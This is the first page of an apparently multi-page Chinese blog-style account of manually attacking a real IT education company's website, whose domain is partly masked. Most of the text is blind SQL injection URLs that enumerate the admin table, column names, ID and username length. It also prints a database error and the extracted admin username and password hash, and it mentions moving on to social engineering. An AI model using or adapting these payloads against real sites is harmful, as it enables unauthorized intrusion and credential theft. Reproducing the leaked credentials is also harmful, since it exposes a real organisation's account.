手工检测某天IT教育集团网站

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%20exists(select%20*%20from%20article_admin)
返回正常,确定了管理表为article_admin .

然后我们尝试猜测列名为username:

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and exists(select username from article_admin)

返回正常页面,列名猜测成功.

猜测ID,在猜测ID的时候我平静的心灵终于被打破,产生了想杀人的冲动,ID=21.....

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%20exists%20(select%20id%20from%20article_admin%20where%20id=21)

再次见到了防注射系统提示:图:

下面我们利用得到的ID,猜测用户名的位数,经过折半测试后确定在了11位.(Amxking:管理员有够变态,一个名字都这么长...)

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%20exists(select%20id%20from%20article_admin%20where%20len(username)=11%20and%20id=1)

猜测用户名: 在猜测中,遇到了麻烦,试了几次都返回同样的错误,心早已不平静,愤怒中.还没等爆发,同事叫我吃午饭,于是将问题丢给了工具......

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89 and exists(select count(*) from article_admin where left(username,1)=’a’)
Microsoft JET Database Engine 错误 '80040e10'

至少一个参数没有被指定值。

/common.asp，行 125

吃完饭后,我的宝贝工具还算争气,将用户名及密码交给了我:

username内容:windecember
password内容:70b895ad9b1b2829

是MD5加密的?丢给cmd5试下,不行.我是没有爆破的习惯,谁叫咱不玩肉鸡了.难道就这样结束了吗?灰心不代表停止进攻,否则火力往哪猛去?(网站后台还没找到,否则就先尝试社工了...)

上一页  [1] [2] [3] 下一页